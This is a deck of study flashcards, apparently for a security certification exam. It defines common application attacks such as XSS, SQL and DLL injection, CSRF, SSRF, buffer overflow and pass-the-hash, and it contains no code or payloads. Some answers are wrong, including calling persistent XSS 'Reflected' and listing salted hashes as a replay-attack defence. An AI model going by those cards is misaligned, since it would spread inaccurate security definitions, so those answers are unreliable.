1.3 Application Attacks Flashcards

1
Q

Define Privilege Escalation

A

Using an existing account to gain privileges beyond that account

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Examples of privilege escalation attacks (2)

A
  1. User A gaining access to resources that only granted to User B
  2. Using a regular user account to launch an attack gaining Administrator/Root access
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Preventing Privilege Escalation attacks (3)

A
  1. Data Execution Prevention (DEP)
  2. Anti-Virus/Malware
  3. Keeping OS patches up-to-date
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Cross Site Scripting attack (XSS)

A

Taking advantage of web browsers and web-based applications use of JavaScript to launch attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

2 Types of Cross Site Scripting attacks

A
  1. Non-Persistent (Client-side)
  2. Persistent or Reflected (Server-side)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Define Non-Persistent Cross Site Scripting Attack

A

Sends a malicious link to a valid, vulnerable web site with malicious JavaScript appended to input fields that will run silently in the background when the user clicks it

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Define Persistent Cross Site Scripting Attack

A

Permanently posting malicious JavaScript on a site that runs every time the page is launched, i.e. via sites that display user messages or forum sites

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Difference between Persistent and Non-Persistent Cross Site Scripting Attack

A

Non-persistent initiated from user’s browser, Persistent is stored on the web-server and runs every time some one accesses the web page

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Define Injection Attack

A

Adding or removing information from a data stream for malicious intent

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

4 Common Injection Attacks

A
  1. SQL Injection
  2. XML Injection
  3. DLL Injection
  4. LDAP Injection
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Define SQL Injection

A

Capitalizing on poorly designed web sites to extract data from databases via modified SQL statements

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Define XML Injection

A

Appending malformed XML to XML exchanged between devices for malicious intent

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Define LDAP Injection

A

Injecting data to LDAP data exchanges to access information from LDAP database

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Define DLL Injection

A

Attaching a malicious DLL to a valid process so that whenever the valid process is run, the malicious process is also run

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Define Pointer/Object Dereference, how and result

A
  1. supply a pointer for memory locations that the product is not expecting
  2. attack might allow modification of critical state variables, cause a crash, or execution of code
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Define Directory Traversal attack and specific server type vulnerable to it

A

Accessing directories on a web server outside of the publicly available directories hosting the web content

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Define Buffer Overflow attack

A

Using one section of memory to overwrite another section of memory causing the application to crash

18
Q

What causes buffer overflow vulnerabilities?

A

Poor application programming

19
Q

Define Race Condition attack

A

Taking advantage of simultaneously running processes for malicious intent

20
Q

What is a TOCTOU attack?

A

Time-Of-Check to Time-Of-Use attack, taking advantage of the timing of the execution of processes for malicious intent, i.e. transferring more money from an account than the available balance due - Race Condition

21
Q

What vulnerability exists related to application error handling?

A

Improper error messages might expose valuable system information, such a stack trace dump, that can be used for further malicious activities

22
Q

Vulnerability exposed by improper input handling?

A

Improperly or not validating data input by users opens application up to injection attacks

23
Q

Define replay attack

A

Gaining information, such as Session IDs, from network traffic and then using that information to create malicious requests

24
Q

Define Session Replay attack

A

Attacker is able to pose as an authorized user by obtaining a session id and posing as another valid user or system

25
Q

Preventing Replay attacks (2)

A
  1. Encrypt all communications
  2. Salting hashes
26
Q

Define Integer overflow

A

Occurs when a larger integer is assigned than memory space is allocated for, causing it to overflow into another memory space crashing an application

27
Q

Define Cross-Site Request Forgery

A

Initiating unwanted actions via client-side browser using an authenticated session

28
Q

What is the abbreviation for Cross-Site Request Forgery? (2)

A

XSRF or CSRF

29
Q

How is a Cross-Site Request Forgery attack initiated?

A

It is dependent on the victim clicking on a malicious URL

30
Q

Define Server-Side Request Forgery

A

A forged request initiated from the server to access services that are not publicly exposed

31
Q

How is a Server-Side Request Forgery attack initiated?

A

Malicious requests are sent to a vulnerable web application that then accesses private services to perform malicious actions

32
Q

Define application programming interface (API) attack

A

Sending malicious HTTP GET requests to an API service to cause a system crash, obtain information, or perform other malicious actions

33
Q

Define Resource Exhaustion attack

A

A type of denial-of-service attack often launched from a single low-bandwidth device to crash a device or service by consuming all of its resources

34
Q

What are 2 examples of Resource Exhaustion attacks?

A
  1. Sending a small zip file that is huge when decompressed
  2. DHCP starvation - creating a bunch of DHCP requests to consume all of the addresses available in the pool
35
Q

Define Memory Leak in an application

A

A vulnerability where memory is not released after use and eventually the application consumes all available memory on the device

36
Q

Define Null Pointer Dereference vulnerability in an application

A

A vulnerability where a memory value is replaced with a NULL value causing the application to crash if not properly handled

37
Q

Define SSL Stripping attack

A

A man-in-middle attack to intercept HTTP(S) communications. The client browser is tricked into downgrading to using HTTP, instead of HTTPS, and HTTP is relayed to the client and HTTPS is relayed to the server. The malicious middle host is now able to access all information communicated.

38
Q

How to avoid SSL Stripping attack

A

Configure client browsers and web servers to not allow HTTP, only HTTPS

39
Q

Define Driver Manipulation attack

A

Exploiting vulnerabilities in drivers to bypass anti-virus/malware scanning for malicious intent

40
Q

Define Driver Manipulation - Shimming attack

A

A shim is a small library that translates API calls to create compatibility between and app and the OS. This shim can create an opportunity for malicious manipulation.

41
Q

Define Driver Manipulation - Refactoring attack

A

Refactoring virus/malware code to evade signature detection by anti-virus/malware programs

42
Q

Define Pass-the-Hash attack

A

If an attacker can capture a hashed password, they can use it in a replay attack to authenticate and impersonate a user or system